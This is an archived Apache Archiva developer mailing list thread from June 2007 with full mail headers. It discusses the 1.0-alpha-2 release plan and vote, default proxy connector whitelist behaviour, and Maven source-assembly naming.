c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=CkEATjCp+0Bi+uZ0vwCbX4ecC7HlJ7bB7V8QrYlkutAKnSzS725JW5m0zwTw8FyNYco9hvqQMMFfjO8eCy4nLC8UexU7Spvt4TVvGx+dYyKxuF9Ve+B8pBsYbqAE9qr5AiydfOTqAtFiFleWi03LF4EuMajKvdLInylJYRGOclg= Received: by 161.129.204.104 with SMTP id m17mr2087359anf.1182571881752; Fri, 22 Jun 2007 21:11:21 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 22 Jun 2007 21:11:21 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 22 Jun 2007 21:11:21 -0700 From: "Wendy Smoak" <[email protected]> To: [email protected] Subject: Re: Planning for 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/20/07, Wendy Smoak <[email protected]> wrote: > I won't have time to test until Friday, but if everything seems to be > in order I'll go ahead with alpha-2 so we have another milestone to > work from. It looks good to me. I'll do 1.0-alpha-2 on Saturday afternoon (GMT -7) from trunk, so please hold off on major changes (or branch for them and merge it afterwards...) -- Wendy From [email protected] Sat Jun 23 04:17:58 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85709 invoked from network); 23 Jun 2007 04:17:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2007 04:17:57 -0000 Received: (qmail 33812 invoked by uid 500); 23 Jun 2007 04:18:00 -0000 Delivered-To: [email protected] Received: (qmail 33779 invoked by uid 500); 23 Jun 2007 04:18:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33770 invoked by uid 99); 23 Jun 2007 04:18:00 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Jun 2007 21:18:00 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Jun 2007 21:17:56 -0700 Received: by an-out-0708.google.com with SMTP id d30so255198and for <[email protected]>; Fri, 22 Jun 2007 21:17:35 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=LE9xHYtQ6hR0gHnsN00ojRGSf1TNpRqL/Amg/lbsZHtK2wlXMpwltIdbxjGeDskO56BjiOppRmFv5GSYrT+KHFhQJXdZQQRUzlVkF2JDF7TCljAw4snFuaN2XHzILYVzOCJhchXOue+Q0pDxlq6a1cYIKD/yUGtRiEf8+gmtIXU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=AIGAa4wcQ6KtZKheLnjQ9QQYlvj++S5BxxDAgjVYQ0+T8O9Zrq5JdXnQzm1Vtuwv4r+EoZ3jStbyLoPeNZqAbbO8JY+LpYBxEftM8E0mR+tnrYEAgpitvdtHnUaGH0TAaz2wsjWY2oBACeSdcJx9TWB6BCND8uZ97DylsE9ZyBk= Received: by 161.129.204.104 with SMTP id o14mr2083163ane.1182572255555; Fri, 22 Jun 2007 21:17:35 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 22 Jun 2007 21:17:35 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 22 Jun 2007 21:17:35 -0700 From: "Wendy Smoak" <[email protected]> To: "Archiva Developers List" <[email protected]> Subject: Proxy connector whitelist/blacklist MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org The proxy connector in the default configuration was apparently intended to proxy requests from internal to central, but it wasn't proxying anything. To get it to work, I added a whitelist entry of '*'. Is that working as designed, or should 'blank' (no whitelist or blacklist entries) mean 'proxy everything' (as seems to be implied by the original default config)? This needs to be documented so I don't have to guess. :) I see it in the list of Concepts on [1] but couldn't find anything else. [1] http://maven.apache.org/archiva/hacking/index.html -- Wendy From [email protected] Sat Jun 23 04:44:03 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89417 invoked from network); 23 Jun 2007 04:44:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2007 04:44:00 -0000 Received: (qmail 49322 invoked by uid 500); 23 Jun 2007 04:44:01 -0000 Delivered-To: [email protected] Received: (qmail 49292 invoked by uid 500); 23 Jun 2007 04:44:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49278 invoked by uid 99); 23 Jun 2007 04:44:01 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Jun 2007 21:44:01 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx06.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Jun 2007 21:43:56 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAHZBfEY6sweI/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,453,1175436000"; d="scan'208";a="52780606" Received: from unknown (HELO [161.129.204.104]) ([161.129.204.104]) by smtp06.syd.iprimus.net.au with ESMTP; 23 Jun 2007 14:43:35 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: svn commit: r549983 - in /maven/archiva/trunk: archiva-web/archiva-standalone/archiva-plexus-runtime/pom.xml pom.xml Date: Sat, 23 Jun 2007 14:33:08 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org On 23/06/2007, at 10:25 AM, [email protected] wrote: > How do I get the source distro to unpack to a directory ending in - > src? > Simply add it to the finalName (you get a weird -src-src artifact in target, but it's correct in the repository and when unpacked - see the maven root pom). - Brett From [email protected] Sat Jun 23 04:48:44 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89946 invoked from network); 23 Jun 2007 04:48:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2007 04:48:39 -0000 Received: (qmail 52592 invoked by uid 500); 23 Jun 2007 04:48:40 -0000 Delivered-To: [email protected] Received: (qmail 52564 invoked by uid 500); 23 Jun 2007 04:48:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 52553 invoked by uid 99); 23 Jun 2007 04:48:40 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Jun 2007 21:48:40 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx05.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Jun 2007 21:48:35 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAABtDfEY6sweI/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,453,1175436000"; d="scan'208";a="52462123" Received: from unknown (HELO [161.129.204.104]) ([161.129.204.104]) by smtp05.syd.iprimus.net.au with ESMTP; 23 Jun 2007 14:48:13 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: Proxy connector whitelist/blacklist Date: Sat, 23 Jun 2007 14:48:10 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org On 23/06/2007, at 2:17 PM, Wendy Smoak wrote: > The proxy connector in the default configuration was apparently > intended to proxy requests from internal to central, but it wasn't > proxying anything. To get it to work, I added a whitelist entry of > '*'. This seems like a sensible default. > > Is that working as designed, or should 'blank' (no whitelist or > blacklist entries) mean 'proxy everything' (as seems to be implied by > the original default config)? I would normally say so, but this would mean the action 'add one thing to blacklist', effectively changes to 'blacklist everything' until you add something to the whitelist. > > This needs to be documented so I don't have to guess. :) I see it in > the list of Concepts on [1] but couldn't find anything else. > > [1] http://maven.apache.org/archiva/hacking/index.html > > -- > Wendy From [email protected] Sat Jun 23 21:10:09 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2483 invoked from network); 23 Jun 2007 21:10:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2007 21:10:08 -0000 Received: (qmail 10930 invoked by uid 500); 23 Jun 2007 21:10:09 -0000 Delivered-To: [email protected] Received: (qmail 10541 invoked by uid 500); 23 Jun 2007 21:10:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10190 invoked by uid 99); 23 Jun 2007 21:10:05 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 23 Jun 2007 14:10:05 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wx-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 23 Jun 2007 14:10:00 -0700 Received: by wx-out-0506.google.com with SMTP id s9so1145016wxc for <[email protected]>; Sat, 23 Jun 2007 14:09:38 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=GRxexLGKCJPZRZ8ma11Ggt3BdRiLjPwIZ7vT0KKac7yxQ4buO5L+8Bl9v7Qtca2N42KdEUGZ0IwaBmX5xXNsN8HSP4bWxabARRm/+EoKN0ZZg5Btd+XKbj7qrxNQUCkLGXIKaNFma6XBRfKbPPc6sFqi6leTbwxeRbu0edFqR6E= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=kAL3oEgo2JJlYhEi09f4Gzxeyd5iJQ+aI5P9ES2HdEMeL53eS2zDbzE2yaGCDwti+RdHmbbaeUe+QgE/EqPh3yYFTzMOvifnr/tNrsCDkiHPzAlZ8Xsc8ZU++8R7JkbBkaA0GFEoiTYvzm56s01FFo+o7Fof+cG8q5FzH6c+q8Y= Received: by 161.129.204.104 with SMTP id a9mr3423509agb.1182632978590; Sat, 23 Jun 2007 14:09:38 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sat, 23 Jun 2007 14:09:38 -0700 (PDT) Message-ID: <[email protected]> Date: Sat, 23 Jun 2007 23:09:38 +0200 From: "Arnaud HERITIER" <[email protected]> To: [email protected] Subject: Re: Planning for 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_95293_29695779.1182632978439" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_95293_29695779.1182632978439 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Don't we have to vote. I'm not specially for this, because we are working on alpha, but what about apache rules ?? Arnaud On 23/06/07, Wendy Smoak <[email protected]> wrote: > > On 6/20/07, Wendy Smoak <[email protected]> wrote: > > > I won't have time to test until Friday, but if everything seems to be > > in order I'll go ahead with alpha-2 so we have another milestone to > > work from. > > It looks good to me. I'll do 1.0-alpha-2 on Saturday afternoon (GMT > -7) from trunk, so please hold off on major changes (or branch for > them and merge it afterwards...) > > -- > Wendy > -- .......................................................... Arnaud HERITIER .......................................................... OCTO Technology - [email protected] www.octo.com | blog.octo.com .......................................................... ASF - [email protected] www.apache.org | maven.apache.org ........................................................... ------=_Part_95293_29695779.1182632978439-- From [email protected] Sat Jun 23 21:30:54 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8640 invoked from network); 23 Jun 2007 21:30:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2007 21:30:52 -0000 Received: (qmail 38295 invoked by uid 500); 23 Jun 2007 21:30:56 -0000 Delivered-To: [email protected] Received: (qmail 38263 invoked by uid 500); 23 Jun 2007 21:30:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38254 invoked by uid 99); 23 Jun 2007 21:30:55 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 23 Jun 2007 14:30:55 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 23 Jun 2007 14:30:51 -0700 Received: by an-out-0708.google.com with SMTP id d30so285731and for <[email protected]>; Sat, 23 Jun 2007 14:30:30 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=XeIPjRlHtatzPkhf9Se+3C5A4M0TWnWxf/Z8syp3MUJsrq4ZLkyCXFgjGT1Xdlivt+mJWzOSJddgS1KsMj7Q0KhWPexPapa1C+R21wu64esWlVdw0IaAZ0yH8OZvA7DlouKq3IhFgndKLm72Si0PhwNYcKmQ5hDiA79U8EnWdSE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Rn9zxCBzVr8nklaFNISc73UXDiE+lajCWD/MQUZz/2OxiJGQrmIHtScqBacUuZzZFgslKu/razx6Mr5+FY2UwylIyO9eDj8ZWo2ixvf7LrnISh3G7KEG1ihlYmPvG7yYM3IFmIOsxQpkl1Sr5xqSsg6oaY2BGxWGecZ1bO7yfg4= Received: by 161.129.204.104 with SMTP id v18mr2343518anf.1182634230872; Sat, 23 Jun 2007 14:30:30 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sat, 23 Jun 2007 14:30:30 -0700 (PDT) Message-ID: <[email protected]> Date: Sat, 23 Jun 2007 14:30:30 -0700 From: "Wendy Smoak" <[email protected]> To: [email protected] Subject: Re: Planning for 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/23/07, Arnaud HERITIER <[email protected]> wrote: > Don't we have to vote. I'm not specially for this, because we are working on > alpha, but what about apache rules ?? Absolutely! I'll stage it on people.a.o and we'll vote on the actual proposed distributions. It's not "a release" until it passes the vote. -- Wendy From [email protected] Sat Jun 23 21:34:22 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8999 invoked from network); 23 Jun 2007 21:34:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2007 21:34:21 -0000 Received: (qmail 39751 invoked by uid 500); 23 Jun 2007 21:34:12 -0000 Delivered-To: [email protected] Received: (qmail 39656 invoked by uid 500); 23 Jun 2007 21:34:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 39615 invoked by uid 99); 23 Jun 2007 21:34:11 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 23 Jun 2007 14:34:11 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 23 Jun 2007 14:34:07 -0700 Received: by an-out-0708.google.com with SMTP id d30so285814and for <[email protected]>; Sat, 23 Jun 2007 14:33:47 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=FVlISfDUu1niwJK+uEYWOsLqQh+EcBtVUHfa7UFdgozJkIO2+HOj0lCz1fWlqx8m+REw29suFkcYI4+rLQUVmiUT4vcV34IDohov93NswX6jI5sAEoNRZWqXSCcf8l6AHsEs0oBEnKGFIa1y9xuLEwGFWP+VZ79I3bSf4XwWwsw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=qzj+nuU97oXNwi1bNOkm7i2TDlc76ggb2SlBBMnP3cU7esd539LUxWakqdwsW1YbgZrQhcO3439XkWFeWrm4c1cy7vnWIske+3v2MiP+UJoqlTui15+Q1dlaSZV7zHKie3T+P5NX7senM94EKQHCipjXDLlsecHvuD5H5Z6KvDM= Received: by 161.129.204.104 with SMTP id 18mr2358394anh.1182634427278; Sat, 23 Jun 2007 14:33:47 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sat, 23 Jun 2007 14:33:47 -0700 (PDT) Message-ID: <[email protected]> Date: Sat, 23 Jun 2007 14:33:47 -0700 From: "Wendy Smoak" <[email protected]> To: [email protected] Subject: Re: svn commit: r549983 - in /maven/archiva/trunk: archiva-web/archiva-standalone/archiva-plexus-runtime/pom.xml pom.xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/22/07, Brett Porter <[email protected]> wrote: > Simply add it to the finalName (you get a weird -src-src artifact in > target, but it's correct in the repository and when unpacked - see > the maven root pom). It's correct when unpacked, and -src-src in target. The name in the repository is always artifactId-version, in this case archiva-parent-1.0-alpha-2-SNAPSHOT-src.zip. But it's better to have the correct directory name inside, and deal with fixing the filename manually. Thanks! -- Wendy From [email protected] Sat Jun 23 21:54:51 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17472 invoked from network); 23 Jun 2007 21:54:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2007 21:54:51 -0000 Received: (qmail 75776 invoked by uid 500); 23 Jun 2007 21:54:54 -0000 Delivered-To: [email protected] Received: (qmail 72028 invoked by uid 500); 23 Jun 2007 21:54:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69358 invoked by uid 99); 23 Jun 2007 21:54:04 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 23 Jun 2007 14:54:04 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 23 Jun 2007 14:53:34 -0700 Received: by an-out-0708.google.com with SMTP id d30so286366and for <[email protected]>; Sat, 23 Jun 2007 14:53:00 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=FRKPJ1GFYo11uvD0bniCaAbPHX1cSDyNTBkSZvKmBLWQXTBPZbGOZSRcNSnlQjj5wrj2oap3YS47+wTvjAIuUVeq5ZPjRWwNC4wedD8C6egKW3O/L27JYaV+Nd7ktvu+9bEMdpnLAznE3c3/3om5DherZSJqQ7Fk/3QLERYgbIM= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=SRYK1avLoB2Oh9vdbCRLeOWFMBbqmfUadR38uihvTnntVSxJdaTa7NgDiQ1oxet0zPhRZCazvXq9/U0AvfaAK+Yxqpm65oWPXerkvAZs+n8e2JT4aCstlyFJEzszFzjyg++6V9zsnIt04hlbP+S6SQcscfqQoM9JflpNiwxCqc8= Received: by 161.129.204.104 with SMTP id q11mr2385768and.1182635579833; Sat, 23 Jun 2007 14:52:59 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sat, 23 Jun 2007 14:52:59 -0700 (PDT) Message-ID: <[email protected]> Date: Sat, 23 Jun 2007 14:52:59 -0700 From: "Wendy Smoak" <[email protected]> To: [email protected] Subject: Re: svn commit: r549983 - in /maven/archiva/trunk: archiva-web/archiva-standalone/archiva-plexus-runtime/pom.xml pom.xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/23/07, Wendy Smoak <[email protected]> wrote: > It's correct when unpacked, and -src-src in target. Adding this got rid of the double -src-src in the filename: <appendAssemblyId>false</appendAssemblyId> It's still artifactId-version in the repository, but that's as expected. We'd have to rename the archiva-parent pom, and that would only fix it for the source distribution, not the plexus runtime binary distro. -- Wendy From [email protected] Sat Jun 23 22:01:23 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21555 invoked from network); 23 Jun 2007 22:01:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2007 22:01:23 -0000 Received: (qmail 85661 invoked by uid 500); 23 Jun 2007 22:01:26 -0000 Delivered-To: [email protected] Received: (qmail 85548 invoked by uid 500); 23 Jun 2007 22:01:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 85526 invoked by uid 99); 23 Jun 2007 22:01:26 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 23 Jun 2007 15:01:26 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wx-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 23 Jun 2007 15:01:21 -0700 Received: by wx-out-0506.google.com with SMTP id s9so1151196wxc for <[email protected]>; Sat, 23 Jun 2007 15:01:00 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=FWAPgBgDzDXsKzzJVvua3DqTX/3QBJJXfK2VSYl1ATgKLxm3lPxEieqxCOJfBf5c3Ux7yAtcqmIPQwNihul7hzzajGQP3eD+tdkCFJtPyWedczTBjFje1ps3rGxRCOiP2yXlxLgenzyOGC/8n9I9PsRk/Dzsrg4cJ6jFVKZIngw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=pMbYbd4Rslm2pMrqaXz3WYvoCoozN3kXiWDrs3bYyeeIn/E2hOOfCSwuJ0AmRSO71DF7QMTL/lryuSTymeThgqJbNkRl4/x9gpKJbu/wok8cRiFz78etgLvfMS6mWcwWGadxNKmrNj+ABIk0/oRJ/IbMH47+1u9+m7JC6pfBurg= Received: by 161.129.204.104 with SMTP id v3mr3421570agb.1182636060164; Sat, 23 Jun 2007 15:01:00 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sat, 23 Jun 2007 15:01:00 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 24 Jun 2007 00:01:00 +0200 From: "Arnaud HERITIER" <[email protected]> To: [email protected] Subject: Re: Planning for 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_95469_15829464.1182636060058" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_95469_15829464.1182636060058 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline ok, sorry for the question. I didn't remember. Arnaud On 23/06/07, Wendy Smoak <[email protected]> wrote: > > On 6/23/07, Arnaud HERITIER <[email protected]> wrote: > > > Don't we have to vote. I'm not specially for this, because we are > working on > > alpha, but what about apache rules ?? > > Absolutely! I'll stage it on people.a.o and we'll vote on the actual > proposed distributions. It's not "a release" until it passes the > vote. > > -- > Wendy > -- .......................................................... Arnaud HERITIER .......................................................... OCTO Technology - [email protected] www.octo.com | blog.octo.com .......................................................... ASF - [email protected] www.apache.org | maven.apache.org ........................................................... ------=_Part_95469_15829464.1182636060058-- From [email protected] Sun Jun 24 02:05:04 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88865 invoked from network); 24 Jun 2007 02:05:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Jun 2007 02:05:03 -0000 Received: (qmail 33573 invoked by uid 500); 24 Jun 2007 02:05:06 -0000 Delivered-To: [email protected] Received: (qmail 33531 invoked by uid 500); 24 Jun 2007 02:05:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33517 invoked by uid 99); 24 Jun 2007 02:05:06 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 23 Jun 2007 19:05:06 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as 